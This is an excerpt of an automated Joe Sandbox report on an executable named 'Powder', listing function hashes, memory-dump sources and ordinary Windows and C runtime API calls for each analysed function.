                                                  • Opcode ID: dc38e8672c25027c27297929edaad6d725aa23159a8f7f7e888ef78fc3641c40
                                                  • Instruction ID: 0fcaafaa6563726e110984485b20f2526b325b9bff51bfa29cf726433d289892
                                                  • Opcode Fuzzy Hash: dc38e8672c25027c27297929edaad6d725aa23159a8f7f7e888ef78fc3641c40
                                                  • Instruction Fuzzy Hash: 33325C70508301DFD724DF14C584B6ABBE1BF84304F15A96DE88AAB3A2D735ED95CB82
                                                  APIs
                                                  • _strcat.LIBCMT ref: 00E7E20C
                                                    • Part of subcall function 00E04D37: __itow.LIBCMT ref: 00E04D62
                                                    • Part of subcall function 00E04D37: __swprintf.LIBCMT ref: 00E04DAC
                                                  • _wcscpy.LIBCMT ref: 00E7E29B
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: __itow__swprintf_strcat_wcscpy
                                                  • String ID:
                                                  • API String ID: 1012013722-0
                                                  • Opcode ID: 7e2a362369975eba98bff7a67fa3509c54aced5ea6b383ff17cf7b28a44651bf
                                                  • Instruction ID: 961519e2347ade830c898fac29e91cf130eff760b674596e7086f3c12de587f1
                                                  • Opcode Fuzzy Hash: 7e2a362369975eba98bff7a67fa3509c54aced5ea6b383ff17cf7b28a44651bf
                                                  • Instruction Fuzzy Hash: E1912775A00604EFCB18DF18C5819ADB7E5EF59314B55D09AE85AAF3A2DB30ED41CF80
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID:
                                                  • API String ID: 3712363035-0
                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                  • Instruction ID: 72fb2112a3fee48adb95e8a0dc5cf3ed6d3757933df7331a631c076dac6795c8
                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                  • Instruction Fuzzy Hash: 2B310870A00119DFDB18DF08E480969F7A6FF59314B659AA5E409EB2A2E731EDC1CB80
                                                  APIs
                                                  • IsThemeActive.UXTHEME ref: 00E15FEF
                                                    • Part of subcall function 00E2359C: __lock.LIBCMT ref: 00E235A2
                                                    • Part of subcall function 00E2359C: DecodePointer.KERNEL32(00000001,?,00E16004,00E58892), ref: 00E235AE
                                                    • Part of subcall function 00E2359C: EncodePointer.KERNEL32(?,?,00E16004,00E58892), ref: 00E235B9
                                                    • Part of subcall function 00E15F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E15F18
                                                    • Part of subcall function 00E15F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E15F2D
                                                    • Part of subcall function 00E15240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E1526C
                                                    • Part of subcall function 00E15240: IsDebuggerPresent.KERNEL32 ref: 00E1527E
                                                    • Part of subcall function 00E15240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00E152E6
                                                    • Part of subcall function 00E15240: SetCurrentDirectoryW.KERNEL32(?), ref: 00E15366
                                                  • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00E1602F
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                  • String ID:
                                                  • API String ID: 1438897964-0
                                                  • Opcode ID: 2223b37e02a4f3545f3f7eb31c66ef70767bd8703f83ddce5c5ef7edb56e87cd
                                                  • Instruction ID: a830265ee72c5bf4c3384dbb8d69b84aee8e54124c0313f3a3432335c22f8683
                                                  • Opcode Fuzzy Hash: 2223b37e02a4f3545f3f7eb31c66ef70767bd8703f83ddce5c5ef7edb56e87cd
                                                  • Instruction Fuzzy Hash: EB116DB19083019FC314EF6AEE0595ABBE8FF88310F00452AF494A72B1DB719589CF92
                                                  APIs
                                                  • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00E13E72,?,?,?,00000000), ref: 00E14327
                                                  • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00E13E72,?,?,?,00000000), ref: 00E50717
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: cd1303a881fc6d24620571e3c4648555b177a826b3428b190930d5c5282e19f7
                                                  • Instruction ID: 261ed46ee7f9bf4e2c6c21f123969b31d64325da81698fd5baf5c335b18e5391
                                                  • Opcode Fuzzy Hash: cd1303a881fc6d24620571e3c4648555b177a826b3428b190930d5c5282e19f7
                                                  • Instruction Fuzzy Hash: 940196B0244319BEF3611E14CC86FE67A9CEB0576CF50C315FAE47A1D0C6B05C898B14
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: __lock_file_memset
                                                  • String ID:
                                                  • API String ID: 26237723-0
                                                  • Opcode ID: b77c8280f12f2b96fa4ce85de445d1c418140d8537e0502d31d7315acf6dcc1c
                                                  • Instruction ID: 73fa73c33c2efdecf30beba4aabc27f3bd2a5eb391c04d55b390c4dff64b2349
                                                  • Opcode Fuzzy Hash: b77c8280f12f2b96fa4ce85de445d1c418140d8537e0502d31d7315acf6dcc1c
                                                  • Instruction Fuzzy Hash: 4001A772C01728EBCF15AF65FE0189F7BA1AF80360F185226F8243B1A1D7758A21DF91
                                                  APIs
                                                    • Part of subcall function 00E28D58: __getptd_noexit.LIBCMT ref: 00E28D58
                                                  • __lock_file.LIBCMT ref: 00E2560B
                                                    • Part of subcall function 00E26E3E: __lock.LIBCMT ref: 00E26E61
                                                  • __fclose_nolock.LIBCMT ref: 00E25616
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                  • String ID:
                                                  • API String ID: 2800547568-0
                                                  • Opcode ID: 80398d92468123d1eec712f873585bce98ac2e2257dbe9da12eac7b04fe857bf
                                                  • Instruction ID: 109de44b2ef92fe57b76e6248f03bc236e4ea1b120fba7d00cf9ad1cdeb6fa13
                                                  • Opcode Fuzzy Hash: 80398d92468123d1eec712f873585bce98ac2e2257dbe9da12eac7b04fe857bf
                                                  • Instruction Fuzzy Hash: 5BF0B472942B259BD7117B75AA027AE77E16F41334F21A209B428BB1C1CBBC4A019F51
                                                  APIs
                                                  • __lock_file.LIBCMT ref: 00E25EB4
                                                  • __ftell_nolock.LIBCMT ref: 00E25EBF
                                                    • Part of subcall function 00E28D58: __getptd_noexit.LIBCMT ref: 00E28D58
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                  • String ID:
                                                  • API String ID: 2999321469-0
                                                  • Opcode ID: 2585294ae636bf209754cab73f7ad497cde1aa5d5394508475cab09255b80d0e
                                                  • Instruction ID: 546c79144adeb8c54d55cee966ea9c21374f193521df79eabe86d44395f18bc2
                                                  • Opcode Fuzzy Hash: 2585294ae636bf209754cab73f7ad497cde1aa5d5394508475cab09255b80d0e
                                                  • Instruction Fuzzy Hash: 69F0A7729126359AD700BB74AB037AE76D06F15331F226306A020BB1D2CF784A019A55
                                                  APIs
                                                  • _memset.LIBCMT ref: 00E15AEF
                                                  • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00E15B1F
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell__memset
                                                  • String ID:
                                                  • API String ID: 928536360-0
                                                  • Opcode ID: 5897958cf7649d64ddcdae84e562e864d52d4aa2e34497ab19769bb458a7a821
                                                  • Instruction ID: 3d249fd9b48aee8c821f9ab4e69468e04ee80f9bb97ed6620a3f9c02ae238687
                                                  • Opcode Fuzzy Hash: 5897958cf7649d64ddcdae84e562e864d52d4aa2e34497ab19769bb458a7a821
                                                  • Instruction Fuzzy Hash: 2DF0A7B18083189FD7928B65DC45FD577BC970030CF0001FAAA88B6292D7760B8CCF51
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: LoadString$__swprintf
                                                  • String ID:
                                                  • API String ID: 207118244-0
                                                  • Opcode ID: 1951084522515996bb0a88085b76ceb90ea04dae1beb16fb1ec32ac82b0f19db
                                                  • Instruction ID: cbf1e6f95005382e7dfa62906cf172ba337cd6dcf8fe70185c139efb4ffb7742
                                                  • Opcode Fuzzy Hash: 1951084522515996bb0a88085b76ceb90ea04dae1beb16fb1ec32ac82b0f19db
                                                  • Instruction Fuzzy Hash: 8CB17F74A0010AEFCB14DFA4D891DEEB7B5FF48714F20915AF919B7291EB30A981CB90
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ccb60fa0ab849f67c6830966b2a8cead7d8004831ae3e68aed64adb750b2cb1c
                                                  • Instruction ID: 3f57fa4d527adcc9bc03f7f07315e42fa56fb2e60dd1b7a61d0f8934d0bc18f7
                                                  • Opcode Fuzzy Hash: ccb60fa0ab849f67c6830966b2a8cead7d8004831ae3e68aed64adb750b2cb1c
                                                  • Instruction Fuzzy Hash: 3661CC70A0020A9FDB14DF60E885ABAB7E5EF84304F59906DE916AB2C1D774ED80CB61
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5cbd33b3871466beaabbc7d9bb1eaf8abdc6dea88efa299d01f8da43522d8300
                                                  • Instruction ID: 02328ba9b76ecacc1bc9caf199d1cd1f0d0c3c4326f2fc5400e75dc5df1041df
                                                  • Opcode Fuzzy Hash: 5cbd33b3871466beaabbc7d9bb1eaf8abdc6dea88efa299d01f8da43522d8300
                                                  • Instruction Fuzzy Hash: 6E518F75704604ABCB14EB64D991EAE77E6AF45314F146458F906BB3D2CB30EE41CB90
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: 101fc5ea3e58a037dd59aff48db56929915dc5471b6f579c4d66d87e7c047d81
                                                  • Instruction ID: 7fced968bb3d6f70fdcc60cb424de6280b77fc7b144818d6c52abebe11ea7bed
                                                  • Opcode Fuzzy Hash: 101fc5ea3e58a037dd59aff48db56929915dc5471b6f579c4d66d87e7c047d81
                                                  • Instruction Fuzzy Hash: F831D079204A12DFD724DF28D480AA1F7E1FF08310714D56AE89AAB791DB30EDC1CB90
                                                  APIs
                                                  • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00E141B2
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 8b492112135bd0756a0cd716365fa40ae4aea0146c291dd0f443d69e567dc3de
                                                  • Instruction ID: d348af1b62de818b96b53c352b72ffabca0ff6ad05508c7f4e0b7f6c22daeeea
                                                  • Opcode Fuzzy Hash: 8b492112135bd0756a0cd716365fa40ae4aea0146c291dd0f443d69e567dc3de
                                                  • Instruction Fuzzy Hash: 68315CB1B01616AFCB18CF2DC880A9DB7B1FF54324F149619E815A3750D770A9E4CB90
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ClearVariant
                                                  • String ID:
                                                  • API String ID: 1473721057-0
                                                  • Opcode ID: 7527720e2c08b5d4fe7aea27aee2df64cf35850f143faa21cfe32bebe9369cfe
                                                  • Instruction ID: edfc0854e8ba44e02924daa9f7994aed3ae526500b0944dec7f5d83aeaf947fd
                                                  • Opcode Fuzzy Hash: 7527720e2c08b5d4fe7aea27aee2df64cf35850f143faa21cfe32bebe9369cfe
                                                  • Instruction Fuzzy Hash: A041FA74505351DFDB24DF14C448B1ABBE1BF85308F0999ACE899AB3A2C371EC95CB52
                                                  APIs
                                                    • Part of subcall function 00E14B29: FreeLibrary.KERNEL32(00000000,?), ref: 00E14B63
                                                    • Part of subcall function 00E2547B: __wfsopen.LIBCMT ref: 00E25486
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00E127AF,?,00000001), ref: 00E149F4
                                                    • Part of subcall function 00E14ADE: FreeLibrary.KERNEL32(00000000), ref: 00E14B18
                                                    • Part of subcall function 00E148B0: _memmove.LIBCMT ref: 00E148FA
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Library$Free$Load__wfsopen_memmove
                                                  • String ID:
                                                  • API String ID: 1396898556-0
                                                  • Opcode ID: f6a7ebe7a8caea19949f773d7443bd7c11181cd31c5c8fda915f2a39cc40824a
                                                  • Instruction ID: c5fb3afe0c57d7a315b12f79d3875aae641e1f2f5ca2a4752a12cf62801b2748
                                                  • Opcode Fuzzy Hash: f6a7ebe7a8caea19949f773d7443bd7c11181cd31c5c8fda915f2a39cc40824a
                                                  • Instruction Fuzzy Hash: A9110172690305ABCB14FB60CC02FEE76E89F40711F109829F941B62C2FB709A84A794
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ClearVariant
                                                  • String ID:
                                                  • API String ID: 1473721057-0
                                                  • Opcode ID: a87f1853760cb19a52a87b43c19376b13322e69816ef5b1b267df596f8ae57a7
                                                  • Instruction ID: 524288d62b0d93122a36aec449c55b87b243c6a6409664f336f5f7873aa1b019
                                                  • Opcode Fuzzy Hash: a87f1853760cb19a52a87b43c19376b13322e69816ef5b1b267df596f8ae57a7
                                                  • Instruction Fuzzy Hash: D32124B4508351DFDB24DF14C444B5ABBE0BF88308F05596CF88A673A2C331E899CB92
                                                  APIs
                                                  • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00E13CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00E14276
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: a6f011728805110b42e18223b1757f664650d93a287fc792ad04f20aa234999a
                                                  • Instruction ID: 906be43d878cbf9da06eeb0ed7bc1304a753d2680984e7d59de953e6a1894ead
                                                  • Opcode Fuzzy Hash: a6f011728805110b42e18223b1757f664650d93a287fc792ad04f20aa234999a
                                                  • Instruction Fuzzy Hash: 47113DB12007019FD330CF55D480BA2B7F5EF48714F10D91EE8AA9AAA0D770E8C5CB50
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: 1c525afb35a08ba61448fa7632487680268de3cf9fd9ecc423eefb0b3bcb829f
                                                  • Instruction ID: d6e0979bc48340f6debb3e9a210dc870c9b989f1822ddb1d691a81c5b376c6cc
                                                  • Opcode Fuzzy Hash: 1c525afb35a08ba61448fa7632487680268de3cf9fd9ecc423eefb0b3bcb829f
                                                  • Instruction Fuzzy Hash: 50018172300225ABCB24DF2DD89196BB7E9EF86365714856EF90ACB245E631E901C7A0
                                                  APIs
                                                    • Part of subcall function 00E20FE6: std::exception::exception.LIBCMT ref: 00E2101C
